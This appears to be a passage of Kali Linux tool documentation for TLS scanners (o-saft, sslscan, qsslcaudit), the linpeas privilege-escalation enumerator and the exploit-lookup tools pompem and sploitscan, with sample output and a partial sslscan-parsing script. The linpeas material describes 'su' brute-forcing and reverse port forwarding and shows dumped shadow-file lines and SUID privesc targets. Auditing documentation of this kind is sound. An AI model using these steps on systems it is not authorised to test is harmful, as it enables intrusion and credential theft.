Note that this may result in loss of information and/or checks.
--ssl-error-max=CNT
Max. amount of consecutive errors (default: 5).
--ssl-error-timeout=SEC
Timeout in seconds when a failed connection is treated as error and
then counted (default: 1).
--ssl-error-total=CNT
Max. total amount of errors (default: 10).
--ssl-lazy
I.g. this tools tries to identify available functionality according
SSL versions from the underlaying libraries. Unsupported versions
are then disables and a warning is shown.
Unfortunately some libraries have not implemented all functions to
check availability of a specific SSL version, which then results in
a compile error.
This option disables the strict check of availability.
If the underlaying library doesn't support the required SSL version
at all, following error may occour:
Can't locate auto/Net/SSLeay/CTX_v2_new.al in @INC ...
See Note on SSL versions for a general note about SSL versions.
A more detailled description of the problem and how Net::SSLeay be-
haves, can be found in the source of o-saft.pl ,
see section starting at
#| check for supported SSL versions
--timeout=SEC
Timeout in seconds when connecting to the target (default: 2).
--call=METHOD
'METHOD' method to be used for specific functionality
Available methods:
* 'info-socket' use internal socket to retrieve information
* 'info-openssl' use external openssl to retrieve information
* 'info-user' use usr_getinfo() to retrieve information
* 'cipher-socket' use internal socket to ckeck for ciphers
* 'cipher-openssl' use external openssl to ckeck for ciphers
* 'cipher-user' use usr_getciphers() to ckeck for ciphers
Method names starting with:
* 'info-'
are responsible to retrieve information about the SSL connection
and the target certificate (i.e. what the +info command provides)
* 'cipher-'
are responsible to connect to the target and test if it supports
the specified ciphers (i.e. what the +cipher command provides)
* 'check-'
are responsible for performing the checks (i.e. what's shown with
the +check command)
* 'score-'
are responsible to compute the score based on check results
The second part of the name denotes which kind of method to call:
* 'socket' the internal functionality with sockets is used
* 'openssl' the exteranl openssl executable is used
* 'user' the external special function, as specified in user's
o-saft-usr.pm, is used.
Example:
--call=cipher-openssl
will use the external "openssl(1)" executable to check the target for
supported ciphers.
Default settings are:
--call=info-socket --call=cipher-socket --call=check-socket
Just for curiosity, instead of using:
o-saft.pl --call=info-user --call=cipher-user --call=check-user --call=score-user ...
consider to use your own script like:
#!/usr/bin/env perl
usr_getinfo();usr_getciphers();usr_checkciphers();usr_score();
:-))
-v
Print list of ciphers in style like: "openssl ciphers -v".
Option used with +ciphers command only.
-V
Print list of ciphers in style like: "openssl ciphers -V".
Option used with +ciphers command only.
[...]
■ Usage example
root@kali:~# o-saft --legacy=quick --no-header +info example.com
Certificate Version 3 (0x2)
Certificate Common Name www.example.org
Certificate Subject /C=US/ST=California/L=Los Angeles/O=Internet\xC2\xA0Corporation\xC2\xA0for\xC2\xA0Assigned\xC2\xA0Names\xC2\xA0and\xC2\xA0Numbers/CN=www.example.org
Certificate Subject Name Hash df4c0278
Certificate Issuer /C=US/O=DigiCert Inc/CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1
Certificate Issuer Name Hash 9f4c149e
Certificate Serial Number 07:5b:ce:f3:06:89:c8:ad:df:13:e5:1a:f4:af:e1:87
Certificate Fingerprint SHA1 Fingerprint=4DA25A6D5EF62C5F95C7BD0A73EA3C177B36999D
Certificate Fingerprint Algorithm SHA1
Certificate Fingerprint Hash Value 4DA25A6D5EF62C5F95C7BD0A73EA3C177B36999D
Certificate Fingerprint SHA2 EFBA26D8C1CE3779AC77630A90F82163A3D6892ED6AFEE408672CF19EBA7A362
Certificate Fingerprint SHA1 4DA25A6D5EF62C5F95C7BD0A73EA3C177B36999D
Certificate Fingerprint MD5 83DC5195F21734E988900A3688DDFED4
Certificate valid since Jan 30 00:00:00 2024 GMT
Certificate valid until Mar 1 23:59:59 2025 GMT
Certificate Validity (date) Jan 30 00:00:00 2024 GMT .. Mar 1 23:59:59 2025 GMT
Certificate Email Addresses
[...]
Certificate Subject's Alternate Names DNS:www.example.org DNS:example.net DNS:example.edu DNS:example.com DNS:example.org DNS:www.example.com DNS:www.example.edu DNS:www.example.net
Validity Alternate Names Given hostname 'example.com' matches alternate name 'example.com' in certificate
Validity Hostname Given hostname 'example.com' does not match CN 'www.example.org' in certificate
Validity Certificate Chain 0 (ok)
CA Chain Verification error ok
Target supports Compression NONE
Target supports Expansion NONE
Target supports Heartbeat
Target supports Extended Master Secret
Target's Resumption PSK
Target supports Resumption no
Target supports Renegotiation renegotiation.
!!Hint: checks only if renegotiation is implemented server-side according RFC 5746
Target supports SRP
Target supports Krb5
Target supports PSK
Target supports PSK Identity Hint
Target's OCSP Response Response Status: successful (0x0); Cert Status: good; This Update: Oct 25 15:51:02 2024 GMT; Next Update:
Target's supported ALPNs http/1.1,h2
Target's supported NPNs
Target's selected protocol (ALPN)
Target's selected protocol (NPN)
Target's advertised protocols
Target's Server public key length 2048 bit
Target's DH Parameter ECDH, prime256v1, 256 bits
Target's Master-Key
Target's Session-ID
Target's Session-ID-ctx
Target's TLS Session Ticket
Target's TLS Session Ticket Lifetime
Target's TLS Session Start Time locale Thu Jan 1 00:00:00 1970
Target's TLS Session Start Time EPOCH
Target's fallback SSL Protocol TLSv1_3
[...]
PEASS-ng
Searches for and enumerates possible misconfigurations within a host (known vulnerabilities, users, processes, file permissions, special file permissions, readable/writable files, etc.).
■ Usage
root@kali:~# linpeas.sh -h
Checks:
-a Perform all checks: 1 min of processes, su brute, and extra checks.
-o Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex). Select a comma separated list.
-s Stealth & faster (don't check some time consuming checks)
-e Perform extra enumeration
-r Enable Regexes (this can take from some mins to hours)
-P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
-D Debug mode
Network recon:
-t Automatic network scan - This option writes to files
-d <IP/NETMASK> Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
-p <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
-i <IP> [-p <PORT(s)>] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
Port forwarding (reverse connection):
-F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT Execute linpeas to forward a port from a your host (LOCAL_IP:LOCAL_PORT) to a remote IP (REMOTE_IP:REMOTE_PORT)
Firmware recon:
-f </FOLDER/PATH> Execute linpeas to search passwords/file permissions misconfigs inside a folder
Misc:
-h To show this message
-w Wait execution between big blocks of checks
-L Force linpeas execution
-M Force macpeas execution
-q Do not show banner
-N Do not use colours
■ Usage example
root@kali:~# ./linpeas.sh -o interesting_perms_files -q
[...]
╔════════════════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 12K Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 13K Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 root root 7.3K Jun 25 2008 /usr/bin/X
-rwsr-xr-x 1 root root 46K Mar 31 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 37K Apr 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 11K Dec 10 2007 /usr/bin/arping
[...]
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root utmp 300K Jan 2 2009 /usr/bin/xterm ---> Solaris_5.5.1_X11R6.3(05-1997)/Debian_xterm_version_222-1etch2(01-2009)
-rwxr-sr-x 1 root shadow 38K Apr 2 2008 /usr/bin/chage
-rwsr-sr-x 1 root root 7.3K Jun 25 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 9.8K Apr 14 2008 /usr/bin/wall
-rwxr-sr-x 1 root utmp 302K Oct 23 2007 /usr/bin/screen ---> GNU_Screen_4.5.0
[...]
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0000000000000000
CapPrm: 00000000a80435fb
CapEff: 00000000a80435fb
CapBnd: 00000000a80435fb
CapAmb: 0000000000000000
══╣ Parent proc capabilities
CapInh: 0000000000000000
CapPrm: 00000000a80435fb
CapEff: 00000000a80435fb
CapBnd: 00000000a80435fb
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 720 Mar 28 2008 usr.sbin.mysqld
-rw-r--r-- 1 root root 725 Apr 9 2008 usr.sbin.named
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. root:*:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:*:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
[...]
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. ═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. total 900
drwxr-xr-x 1 root root 4096 Nov 2 18:29 .
drwxr-xr-x 1 root root 4096 Nov 2 18:28 ..
-rw------- 1 root root 536 Nov 2 18:24 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
drwx------ 3 root root 4096 May 20 2012 .config
[...]
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/msfadmin/.bash_history
/home/msfadmin/.distcc/lock
/home/msfadmin/.distcc/lock/cpu_localhost_0
/home/ftp
/root/
[...]
Pompem
Searches for vulnerability information by the specified keyword in the following data sources:
- PacketStorm security
- CXSecurity
- ZeroDay
- Vulners
- National Vulnerability Database
- WPScan Vulnerability Database
■ Usage
root@kali:~# pompem --help
Options:
-h, --help show this help message and exit
-s, --search <keyword,keyword,keyword> text for search
--txt Write txt File
--html Write html File
--update upgrade to latest version
-g, --get Download exploit files
■ Usage example
root@kali:~# pompem -s wordpress
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+Date Description Url
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-31 | WordPress Automatic 3.92.0 Path Traversal / Server | https://packetstormsecurity.com/files/182428/WordPress-Automatic-3.92.0-Path-Traversal-Server-Side-Request-Forgery.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-30 | WordPress WP-Automatic SQL Injection | https://packetstormsecurity.com/files/182408/WordPress-WP-Automatic-SQL-Injection.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-14 | WordPress File Manager Advanced Shortcode 2.3.2 Co | https://packetstormsecurity.com/files/182169/WordPress-File-Manager-Advanced-Shortcode-2.3.2-Code-Injectin-Shell-Upload.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-03 | WordPress Bricks Builder Theme 1.9.6 Code Injectio | https://packetstormsecurity.com/files/181987/WordPress-Bricks-Builder-Theme-1.9.6-Code-Injection.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-03 | WordPress Hash Form 1.1.0 Code Injection | https://packetstormsecurity.com/files/181986/WordPress-Hash-Form-1.1.0-Code-Injection.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[...]
qsslcaudit
Performs security testing of SSL/TLS clients.
■ Usage
root@kali:~# qsslcaudit --help
Usage: qsslcaudit [options]
SSL client tests:
1: (certs) custom certificate trust
certificate trust test with user-supplied certificate
2: (certs) self-signed certificate for target domain trust
certificate trust test with self-signed certificate for user-supplied common name
3: (certs) self-signed certificate for invalid domain trust
certificate trust test with self-signed certificate for www.example.com
4: (certs) custom certificate for target domain trust
certificate trust test with user-supplied common name signed by user-supplied certificate
5: (certs) custom certificate for invalid domain trust
certificate trust test with www.example.com common name signed by user-supplied certificate
6: (certs) certificate for target domain signed by custom CA trust
certificate trust test with user-supplied common name signed by user-supplied CA certificate
7: (certs) certificate for invalid domain signed by custom CA trust
certificate trust test with www.example.com common name signed by user-supplied CA certificate
8: (protos) SSLv2 protocol support
test for SSLv2 protocol support
9: (protos) SSLv3 protocol support
test for SSLv3 protocol support
10: (ciphers) SSLv3 protocol and EXPORT grade ciphers support
test for SSLv3 protocol and EXPORT grade ciphers support
11: (ciphers) SSLv3 protocol and LOW grade ciphers support
test for SSLv3 protocol and LOW grade ciphers support
12: (ciphers) SSLv3 protocol and MEDIUM grade ciphers support
test for SSLv3 protocol and MEDIUM grade ciphers support
13: (protos) TLS 1.0 protocol support
test for TLS 1.0 protocol support
14: (ciphers) TLS 1.0 protocol and EXPORT grade ciphers support
test for TLS 1.0 protocol and EXPORT grade ciphers support
15: (ciphers) TLS 1.0 protocol and LOW grade ciphers support
test for TLS 1.0 protocol and LOW grade ciphers support
16: (ciphers) TLS 1.0 protocol and MEDIUM grade ciphers support
test for TLS 1.0 protocol and MEDIUM grade ciphers support
17: (ciphers) TLS 1.1 protocol and EXPORT grade ciphers support
test for TLS 1.1 protocol and EXPORT grade ciphers support
18: (ciphers) TLS 1.1 protocol and LOW grade ciphers support
test for TLS 1.1 protocol and LOW grade ciphers support
19: (ciphers) TLS 1.1 protocol and MEDIUM grade ciphers support
test for TLS 1.1 protocol and MEDIUM grade ciphers support
20: (ciphers) TLS 1.2 protocol and EXPORT grade ciphers support
test for TLS 1.2 protocol and EXPORT grade ciphers support
21: (ciphers) TLS 1.2 protocol and LOW grade ciphers support
test for TLS 1.2 protocol and LOW grade ciphers support
22: (ciphers) TLS 1.2 protocol and MEDIUM grade ciphers support
test for TLS 1.2 protocol and MEDIUM grade ciphers support
23: (ciphers) DTLS 1.0 protocol and EXPORT grade ciphers support
test for DTLS 1.0 protocol and EXPORT grade ciphers support
24: (ciphers) DTLS 1.0 protocol and LOW grade ciphers support
test for DTLS 1.0 protocol and LOW grade ciphers support
25: (ciphers) DTLS 1.0 protocol and MEDIUM grade ciphers support
test for DTLS 1.0 protocol and MEDIUM grade ciphers support
26: (ciphers) DTLS 1.2 protocol and EXPORT grade ciphers support
test for DTLS 1.2 protocol and EXPORT grade ciphers support
27: (ciphers) DTLS 1.2 protocol and LOW grade ciphers support
test for DTLS 1.2 protocol and LOW grade ciphers support
28: (ciphers) DTLS 1.2 protocol and MEDIUM grade ciphers support
test for DTLS 1.2 protocol and MEDIUM grade ciphers support
29: (certs) CVE-2020-0601 ECC cert trust
test for trusting certificate signed by private key with custom curve
Options:
-h, --help Displays help on commandline options.
--help-all Displays help including Qt specific options.
-v, --version Displays version information.
-l, --listen-address <0.0.0.0> listen on <address>
-p, --listen-port <8443> bind to <port>
--user-cn <example.com> common name (CN) to suggest to client
--server <https://example.com> grab certificate information from <server>
--user-cert <~/host.cert> path to file containing custom certificate
(or chain of certificates)
--user-key <~/host.key> path to file containing custom private key
--user-ca-cert <~/ca.cert> path to file containing custom certificate
usable as CA
--user-ca-key <~/ca.key> path to file containing custom private key
for CA certificate
--selected-tests <1,3,5> comma-separated list of tests (id) to execute
--forward <127.0.0.1:6666> forward connection to upstream proxy
--show-ciphers show ciphers provided by loaded openssl
library
--starttls <ftp|smtp|xmpp> exchange specific STARTTLS messages before
starting secure connection
--loop-tests infinitely repeat selected tests (use Ctrl-C
to kill the tool)
-w, --wait-data-timeout <5000> wait for incoming data <ms> milliseconds
before emitting error
--output-xml <qsslcaudit.xml> save results in XML
--pid-file </tmp/qs.pid> create a pidfile once initialized
--dtls use DTLS protocol over UDP
--double-first-test execute the first test two times and ignore
its client fingerprint
■ Example
# Run test 2 (self-signed certificate for target domain trust)
root@kali:~# qsslcaudit -l 0.0.0.0 --selected-tests 2 --user-cn evil.domain.tld
preparing selected tests...
SSL library used: OpenSSL 1.0.2u 20 Dec 2019
running test #2: certificate trust test with self-signed certificate for user-supplied common name
listening on 0.0.0.0:8443
# Send a request to the endpoint using HTTPie
root@kali:~# https 192.168.11.3:8443
https: error: SSLError: ...
# The test result (PASSED) is displayed
root@kali:~# qsslcaudit -l 0.0.0.0 --selected-tests 2 --user-cn evil.domain.tld
[...]
report:
client did not accept fake certificate
result: PASSED
test finished
tests results summary table:
+----+------------------------------------+------------+-----------------------------+
| ## | Test Name | Result | Comment |
+----+------------------------------------+------------+-----------------------------+
| 2 | self-signed certificate for target | PASSED | |
| | domain trust | | |
+----+------------------------------------+------------+-----------------------------+
[...]
# Send a request to the endpoint using a PHP 5.2.x function
root@kali:~# php -r "file_get_contents('https://192.168.11.3:8443');"
Warning: file_get_contents(https://192.168.11.3:8443): failed to open stream: HTTP request failed! in Command line code on line 1
# The test result (FAILED) is displayed
root@kali:~# qsslcaudit -l 0.0.0.0 --selected-tests 2 --user-cn evil.domain.tld
[...]
report:
test failed, client accepted fake certificate, data was intercepted
result: FAILED
test finished
tests results summary table:
+----+------------------------------------+------------+-----------------------------+
| ## | Test Name | Result | Comment |
+----+------------------------------------+------------+-----------------------------+
| 2 | self-signed certificate for target | FAILED !!! | mitm possible |
| | domain trust | | |
+----+------------------------------------+------------+-----------------------------+
[...]
SploitScan
Provides detailed information on vulnerabilities and their associated exploits.
■ Usage
root@kali:~# sploitscan --help
usage: sploitscan [-h] [-e {json,JSON,csv,CSV,html,HTML}] [-t {nessus,nexpose,openvas,docker}] [-i IMPORT_FILE] [-c CONFIG] [-d] [cve_ids ...]
positional arguments:
cve_ids Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces. Format for each ID: CVE-YYYY-NNNNN.
This argument is optional if an import file is provided using the -i option.
options:
-h, --help show this help message and exit
-e {json,JSON,csv,CSV,html,HTML}, --export {json,JSON,csv,CSV,html,HTML}
Optional: Export the results to a JSON, CSV, or HTML file. Specify the format: 'json', 'csv', or 'html'.
-t {nessus,nexpose,openvas,docker}, --type {nessus,nexpose,openvas,docker}
Specify the type of the import file: 'nessus', 'nexpose', 'openvas' or 'docker'.
-i IMPORT_FILE, --import-file IMPORT_FILE
Path to an import file from a vulnerability scanner. If used, CVE IDs can be omitted from the command line arguments.
-c CONFIG, --config CONFIG
Path to a custom config file.
-d, --debug Enable debug output.
■ Example
root@kali:~# sploitscan CVE-2024-44000
╔════════════════════════╗
║ CVE ID: CVE-2024-44000 ║
╚════════════════════════╝
┌───[ 🔍 Vulnerability information ]
|
├ Published: 2024-10-20
├ Base Score: 9.8 (CRITICAL)
├ Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
└ Description: Insufficiently Protected Credentials vulnerability in LiteSpeed Technologies LiteSpeed Cache allows
Authentication Bypass.This issue affects LiteSpeed Cache: from n/a before 6.5.0.1.
┌───[ ♾️ Exploit Prediction Score (EPSS) ]
|
└ EPSS Score: 54.81% Probability of exploitation.
┌───[ 🛡️ CISA KEV Catalog ]
|
└ ❌ No data found.
┌───[ 💣 Public Exploits (Total: 5) ]
|
├ GitHub
│ ├ Date: 2024-10-31 - https://github.com/zgimszhd61/CVE-2024-44000
│ ├ Date: 2024-10-11 - https://github.com/geniuszlyy/CVE-2024-44000
│ ├ Date: 2024-09-16 - https://github.com/ifqygazhar/CVE-2024-44000-LiteSpeed-Cache
│ ├ Date: 2024-09-06 - https://github.com/gbrsh/CVE-2024-44000
│ └ Date: 2024-09-06 - https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache
│
└ Other
├ PacketStorm: https://packetstormsecurity.com/search/?q=CVE-2024-44000
└ Nuclei: https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-44000.yaml
┌───[ 🕵️ HackerOne Hacktivity ]
|
├ Rank: 7141
├ Reports: 0
└ Severity: Unknown: 0 / None: 0 / Low: 0 / Medium: 0 / High: 0 / Critical: 0
┌───[ 🤖 AI-Powered Risk Assessment ]
|
|
| 1. Risk Assessment
| -------------------
|
| The vulnerability identified as CVE-2024-44000 is a critical security issue affecting LiteSpeed
| Technologies' LiteSpeed Cache versions prior to 6.5.0.1. This vulnerability is classified as
| Insufficiently Protected Credentials, leading to an authentication bypass risk. With a CVSS base
| score of 9.8, its criticality stems from ease of exploitation, requiring no privileges and
| interaction, occurring over a network vector. Exploitation can severely impact business operations
| by compromising confidentiality, integrity, and availability. An unauthenticated attacker could
| potentially gain control over affected repositories, leading to unauthorized data access,
| modification, or even denial of service to legitimate users. Given the EPSS score of 0.548080000,
| there is a moderate likelihood of this vulnerability being exploited in the wild if not promptly
| addressed. However, the current standing with CISA shows no active incidents linked to ransomware
| attacks leveraging this flaw.
|
| 2. Potential Attack Scenarios
| ------------------------------
|
| A potential attack scenario involves an external attacker targeting an organization's online
| assets using LiteSpeed Cache. By exploiting the insufficiently protected credentials flaw, the
| attacker can perform an authentication bypass without requiring user interaction or elevated
| privileges. The attacker transmits malicious payloads to the vulnerable system over the network.
| This exploitation allows unauthorized access to the administrative functionalities of the affected
| site. The attacker could then exfiltrate sensitive data, modify critical configurations, or inject
| ransomware, potentially leading to a total systemic compromise or prolonged downtime affecting
| service availability.
|
| 3. Mitigation Recommendations
| ------------------------------
|
| Immediate action is required to mitigate this vulnerability effectively. Organizations should
| ensure that all instances of LiteSpeed Cache are updated to version 6.5.0.1 or higher, where the
| vulnerability is addressed, and the security flaw is patched. It's crucial to regularly check for
| updates from the vendor and apply them promptly. Network administrators should review access logs
| for any signs of suspicious activities indicating an exploitation attempt. Additional
| administrative controls, such as enhancing authentication mechanisms or implementing stricter
| access policies, can provide layers of security. Reference resources, such as the Patchstack
| advisories, provide extensive guidance on securing LiteSpeed Cache implementations and further
| protective measures can be found at: https://patchstack.com/database/vulnerability/litespeed-
| cache/wordpress-litespeed-cache-plugin-6-5-0-1-unauthenticated-account-takeover-
| vulnerability?_s_id=cve
|
| 4. Executive Summary
| ---------------------
|
| CVE-2024-44000 is a critical vulnerability affecting LiteSpeed Cache, allowing attackers to bypass
| authentication due to insufficiently protected credentials. The gravity of this vulnerability is
| underscored by its high CVSS score of 9.8, indicating extreme risk to confidentiality, integrity,
| and availability. Rapid exploitation techniques in circulation heighten the urgency to apply the
| recommended patch to version 6.5.0.1 or newer. Organizations utilizing vulnerable versions face
| significant risks, including unauthorized access to sensitive data and potential disruption of
| services. Prompt mitigation is not only a technical necessity but a business imperative to
| safeguard critical assets and maintain trust with stakeholders. Addressing this vulnerability
| decisively and urgently is vital in preempting potential compromises and ensuring the continuity
| of secure operations.
|
└────────────────────────────────────────
┌───[ ⚠️ Patching Priority Rating ]
|
└ Priority: A+
┌───[ 📚 Further References ]
|
├ https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-5-0-1-unauthenticated-account-takeover-vulnerability?_s_id=cve
└ https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin?_s_id=cve
sslscan
Queries SSL/TLS services (such as HTTPS) and displays the protocol versions, cipher suites, key exchange, signature algorithms, and certificates in use.
■ Usage
root@kali:~# sslscan --help
Command:
sslscan [options] [host:port | host]
Options:
--targets=<file> A file containing a list of hosts to check.
Hosts can be supplied with ports (host:port)
--sni-name=<name> Hostname for SNI
--ipv4, -4 Only use IPv4
--ipv6, -6 Only use IPv6
--show-certificate Show full certificate information
--show-certificates Show chain full certificates information
--show-client-cas Show trusted CAs for TLS client auth
--no-check-certificate Don't warn about weak certificate algorithm or keys
--ocsp Request OCSP response from server
--pk=<file> A file containing the private key or a PKCS#12 file
containing a private key/certificate pair
--pkpass=<password> The password for the private key or PKCS#12 file
--certs=<file> A file containing PEM/ASN1 formatted client certificates
--ssl2 Only check if SSLv2 is enabled
--ssl3 Only check if SSLv3 is enabled
--tls10 Only check TLSv1.0 ciphers
--tls11 Only check TLSv1.1 ciphers
--tls12 Only check TLSv1.2 ciphers
--tls13 Only check TLSv1.3 ciphers
--tlsall Only check TLS ciphers (all versions)
--show-ciphers Show supported client ciphers
--show-cipher-ids Show cipher ids
--iana-names Use IANA/RFC cipher names rather than OpenSSL ones
--show-times Show handhake times in milliseconds
--no-cipher-details Disable EC curve names and EDH/RSA key lengths output
--no-ciphersuites Do not check for supported ciphersuites
--no-compression Do not check for TLS compression (CRIME)
--no-fallback Do not check for TLS Fallback SCSV
--no-groups Do not enumerate key exchange groups
--no-heartbleed Do not check for OpenSSL Heartbleed (CVE-2014-0160)
--no-renegotiation Do not check for TLS renegotiation
--show-sigs Enumerate signature algorithms
--starttls-ftp STARTTLS setup for FTP
--starttls-imap STARTTLS setup for IMAP
--starttls-irc STARTTLS setup for IRC
--starttls-ldap STARTTLS setup for LDAP
--starttls-mysql STARTTLS setup for MYSQL
--starttls-pop3 STARTTLS setup for POP3
--starttls-psql STARTTLS setup for PostgreSQL
--starttls-smtp STARTTLS setup for SMTP
--starttls-xmpp STARTTLS setup for XMPP
--xmpp-server Use a server-to-server XMPP handshake
--rdp Send RDP preamble before starting scan
--bugs Enable SSL implementation bug work-arounds
--no-colour Disable coloured output
--sleep=<msec> Pause between connection request. Default is disabled
--timeout=<sec> Set socket timeout. Default is 3s
--connect-timeout=<sec> Set connect timeout. Default is 75s
--verbose Display verbose output
--version Display the program version
--xml=<file> Output results to an XML file. Use - for STDOUT.
--help Display the help text you are now reading
■ Example
root@kali:~# sslscan example.com
Testing SSL server example.com on port 443 using SNI name example.com
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 enabled
TLS Fallback SCSV:
Server supports TLS Fallback SCSV
TLS renegotiation:
Secure session renegotiation supported
TLS Compression:
Compression disabled
Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.3 256 bits TLS_AES_256_GCM_SHA384 Curve P-256 DHE 256
Accepted TLSv1.3 256 bits TLS_CHACHA20_POLY1305_SHA256 Curve P-256 DHE 256
Accepted TLSv1.3 128 bits TLS_AES_128_GCM_SHA256 Curve P-256 DHE 256
Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
[...]
Server Key Exchange Group(s):
TLSv1.3 128 bits secp256r1 (NIST P-256)
TLSv1.2 128 bits secp256r1 (NIST P-256)
SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 2048
Subject: www.example.org
Altnames: DNS:www.example.org, DNS:example.net, DNS:example.edu, DNS:example.com, DNS:example.org, DNS:www.example.com, DNS:www.example.edu, DNS:www.example.net
Issuer: DigiCert Global G2 TLS RSA SHA256 2020 CA1
Not valid before: Jan 30 00:00:00 2024 GMT
Not valid after: Mar 1 23:59:59 2025 GMT
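As an added example (not part of sslscan or of this page's original content), the Python script below parses the sslscan text format shown above and grades it into findings, so a run like the one against example.com can be checked automatically for legacy protocols, weak or non-PFS ciphers, and certificate expiry. The sample input is constructed from that run, trimmed, with two cipher lines (AES128-SHA and DES-CBC3-SHA) added by hand so the cipher checks fire; the negative-case strings for Fallback SCSV, compression and Heartbleed are assumed sslscan wording, since the run above shows only the passing cases.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the example.com run above, trimmed, plus two hand-added
# cipher lines (AES128-SHA, DES-CBC3-SHA) so that the weak-cipher checks fire.
SAMPLE_OUTPUT = """\
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 enabled
TLS Fallback SCSV:
Server supports TLS Fallback SCSV
Heartbleed:
TLSv1.2 not vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.3 256 bits TLS_AES_256_GCM_SHA384 Curve P-256 DHE 256
Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits AES128-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 2048
Not valid after: Mar 1 23:59:59 2025 GMT
"""
# Constructed: the date the sample scan is taken to have run (drives expiry checks).
SCAN_DATE = datetime(2024, 11, 1)

PROTO_RE = re.compile(r"^(SSLv2|SSLv3|TLSv1\.[0-3]) (enabled|disabled)$")
CIPHER_RE = re.compile(r"^(Preferred|Accepted) (SSLv[23]|TLSv1\.[0-3]) (\d+) bits (\S+)")
CERT_RE = re.compile(r"^(Signature Algorithm|RSA Key Strength|Not valid after): (.+)$")
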